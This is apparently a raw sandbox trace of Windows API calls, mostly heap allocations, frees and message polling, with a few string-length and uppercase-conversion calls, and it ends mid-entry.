PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.165] lstrlenW (lpString="75") returned 2 [0085.165] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.165] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.166] lstrlenW (lpString="69") returned 2 [0085.166] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.166] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.166] lstrlenW (lpString="6E") returned 2 [0085.166] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.166] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.166] lstrlenW (lpString="74") returned 2 [0085.166] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.166] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.210] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.210] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.210] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.210] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.221] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72d88 [0085.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0510 [0085.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f08b8 [0085.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72bf8 [0085.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0738 [0085.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0768 [0085.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72d98 [0085.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0798 [0085.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f07c8 [0085.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72c18 [0085.224] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f07e0 [0085.224] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72c18 | out: hHeap=0x2af0000) returned 1 [0085.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0828 [0085.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72c68 [0085.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72c68 | out: hHeap=0x2af0000) returned 1 [0085.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0a08 [0085.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72c78 [0085.225] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72c78 | out: hHeap=0x2af0000) returned 1 [0085.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f08e8 [0085.225] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72d08 [0085.226] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0b70 [0085.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f07e0 | out: hHeap=0x2af0000) returned 1 [0085.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f07c8 | out: hHeap=0x2af0000) returned 1 [0085.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0828 | out: hHeap=0x2af0000) returned 1 [0085.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0a08 | out: hHeap=0x2af0000) returned 1 [0085.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0798 | out: hHeap=0x2af0000) returned 1 [0085.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72d98 | out: hHeap=0x2af0000) returned 1 [0085.226] lstrlenW (lpString="70") returned 2 [0085.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f08e8 | out: hHeap=0x2af0000) returned 1 [0085.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72d08 | out: hHeap=0x2af0000) returned 1 [0085.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0b70 | out: hHeap=0x2af0000) returned 1 [0085.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0768 | out: hHeap=0x2af0000) returned 1 [0085.226] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0738 | out: hHeap=0x2af0000) returned 1 [0085.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72bf8 | out: hHeap=0x2af0000) returned 1 [0085.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0738 [0085.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0768 [0085.227] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72d38 [0085.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f08b8 | out: hHeap=0x2af0000) returned 1 [0085.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0510 | out: hHeap=0x2af0000) returned 1 [0085.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72d88 | out: hHeap=0x2af0000) returned 1 [0085.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0768 | out: hHeap=0x2af0000) returned 1 [0085.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72d38 | out: hHeap=0x2af0000) returned 1 [0085.227] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0738 | out: hHeap=0x2af0000) returned 1 [0085.227] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.228] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.228] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72d98 [0085.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0738 [0085.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0768 [0085.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72c68 [0085.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0798 [0085.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f07c8 [0085.229] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72d38 [0085.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f08b8 [0085.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f07e0 [0085.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72ba8 [0085.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0828 [0085.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72ba8 | out: hHeap=0x2af0000) returned 1 [0085.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0b70 [0085.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72bc8 [0085.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72bc8 | out: hHeap=0x2af0000) returned 1 [0085.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0978 [0085.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72d88 [0085.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72d88 | out: hHeap=0x2af0000) returned 1 [0085.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f08e8 [0085.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72c78 [0085.246] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0a08 [0085.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0828 | out: hHeap=0x2af0000) returned 1 [0085.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f07e0 | out: hHeap=0x2af0000) returned 1 [0085.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0b70 | out: hHeap=0x2af0000) returned 1 [0085.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0978 | out: hHeap=0x2af0000) returned 1 [0085.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f08b8 | out: hHeap=0x2af0000) returned 1 [0085.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72d38 | out: hHeap=0x2af0000) returned 1 [0085.246] lstrlenW (lpString="74") returned 2 [0085.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f08e8 | out: hHeap=0x2af0000) returned 1 [0085.246] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72c78 | out: hHeap=0x2af0000) returned 1 [0085.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0a08 | out: hHeap=0x2af0000) returned 1 [0085.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f07c8 | out: hHeap=0x2af0000) returned 1 [0085.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0798 | out: hHeap=0x2af0000) returned 1 [0085.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72c68 | out: hHeap=0x2af0000) returned 1 [0085.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0798 [0085.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f07c8 [0085.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72be8 [0085.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0768 | out: hHeap=0x2af0000) returned 1 [0085.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0738 | out: hHeap=0x2af0000) returned 1 [0085.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72d98 | out: hHeap=0x2af0000) returned 1 [0085.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f07c8 | out: hHeap=0x2af0000) returned 1 [0085.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72be8 | out: hHeap=0x2af0000) returned 1 [0085.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0798 | out: hHeap=0x2af0000) returned 1 [0085.247] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.247] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72c98 [0085.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0738 [0085.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0768 [0085.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72d18 [0085.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0798 [0085.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f07c8 [0085.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72d78 [0085.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f07e0 [0085.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0828 [0085.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72bf8 [0085.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f08b8 [0085.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72bf8 | out: hHeap=0x2af0000) returned 1 [0085.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0a08 [0085.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72c68 [0085.247] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72c68 | out: hHeap=0x2af0000) returned 1 [0085.247] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0b70 [0085.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72bc8 [0085.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72bc8 | out: hHeap=0x2af0000) returned 1 [0085.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f08e8 [0085.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72ba8 [0085.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0930 [0085.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f08b8 | out: hHeap=0x2af0000) returned 1 [0085.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0828 | out: hHeap=0x2af0000) returned 1 [0085.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0a08 | out: hHeap=0x2af0000) returned 1 [0085.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0b70 | out: hHeap=0x2af0000) returned 1 [0085.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f07e0 | out: hHeap=0x2af0000) returned 1 [0085.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72d78 | out: hHeap=0x2af0000) returned 1 [0085.248] lstrlenW (lpString="72") returned 2 [0085.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f08e8 | out: hHeap=0x2af0000) returned 1 [0085.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72ba8 | out: hHeap=0x2af0000) returned 1 [0085.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0930 | out: hHeap=0x2af0000) returned 1 [0085.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f07c8 | out: hHeap=0x2af0000) returned 1 [0085.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0798 | out: hHeap=0x2af0000) returned 1 [0085.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72d18 | out: hHeap=0x2af0000) returned 1 [0085.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0798 [0085.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f07c8 [0085.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72d38 [0085.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0768 | out: hHeap=0x2af0000) returned 1 [0085.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0738 | out: hHeap=0x2af0000) returned 1 [0085.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72c98 | out: hHeap=0x2af0000) returned 1 [0085.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f07c8 | out: hHeap=0x2af0000) returned 1 [0085.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72d38 | out: hHeap=0x2af0000) returned 1 [0085.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0798 | out: hHeap=0x2af0000) returned 1 [0085.248] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0085.248] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72c18 [0085.248] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f08b8 [0085.248] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72c18 | out: hHeap=0x2af0000) returned 1 [0085.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0738 [0085.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f08b8 | out: hHeap=0x2af0000) returned 1 [0085.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0828 [0085.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0738 | out: hHeap=0x2af0000) returned 1 [0085.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0085.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efe98 | out: hHeap=0x2af0000) returned 1 [0085.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efe08 | out: hHeap=0x2af0000) returned 1 [0085.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a79790 | out: hHeap=0x2af0000) returned 1 [0085.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72c38 | out: hHeap=0x2af0000) returned 1 [0085.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a79498 | out: hHeap=0x2af0000) returned 1 [0085.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f04c8 | out: hHeap=0x2af0000) returned 1 [0085.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0150 | out: hHeap=0x2af0000) returned 1 [0085.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72bd8 | out: hHeap=0x2af0000) returned 1 [0085.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a79768 | out: hHeap=0x2af0000) returned 1 [0085.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0270 | out: hHeap=0x2af0000) returned 1 [0085.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f01e0 | out: hHeap=0x2af0000) returned 1 [0085.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a79740 | out: hHeap=0x2af0000) returned 1 [0085.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72d28 | out: hHeap=0x2af0000) returned 1 [0085.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a79718 | out: hHeap=0x2af0000) returned 1 [0085.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29eff88 | out: hHeap=0x2af0000) returned 1 [0085.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72ca8 | out: hHeap=0x2af0000) returned 1 [0085.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efbb0 | out: hHeap=0x2af0000) returned 1 [0085.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efe20 | out: hHeap=0x2af0000) returned 1 [0085.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efec8 | out: hHeap=0x2af0000) returned 1 [0085.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efa00 | out: hHeap=0x2af0000) returned 1 [0085.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72c58 | out: hHeap=0x2af0000) returned 1 [0085.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efa48 | out: hHeap=0x2af0000) returned 1 [0085.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0085.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29efaf0 | out: hHeap=0x2af0000) returned 1 [0085.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29efa00 [0085.249] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0828 | out: hHeap=0x2af0000) returned 1 [0085.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0738 [0085.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0798 [0085.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0085.249] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a79510 [0085.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f07c8 [0085.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72c58 [0085.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f07c8 | out: hHeap=0x2af0000) returned 1 [0085.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a793d0 [0085.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0768 [0085.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f07c8 [0085.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72d08 [0085.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0738 | out: hHeap=0x2af0000) returned 1 [0085.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a79538 [0085.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72bb8 [0085.250] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0085.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a79538 | out: hHeap=0x2af0000) returned 1 [0085.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72bb8 | out: hHeap=0x2af0000) returned 1 [0085.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f08b8 [0085.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72ba8 [0085.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0738 [0085.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f07e0 [0085.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72c28 [0085.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72bf8 [0085.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72bf8 | out: hHeap=0x2af0000) returned 1 [0085.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0828 [0085.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72c28 | out: hHeap=0x2af0000) returned 1 [0085.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x29f0b70 [0085.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a793f8 [0085.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f08e8 [0085.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72bd8 [0085.250] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f08e8 | out: hHeap=0x2af0000) returned 1 [0085.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a796f0 [0085.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f08e8 [0085.250] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0930 [0085.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0085.251] PeekMessageW (in: lpMsg=0x8ceed8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceed8) returned 0 [0085.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0978 [0085.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72c38 [0085.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f0978 | out: hHeap=0x2af0000) returned 1 [0085.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a796c8 [0085.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0a08 [0085.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f0978 [0085.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72d78 [0085.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a79740 [0085.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 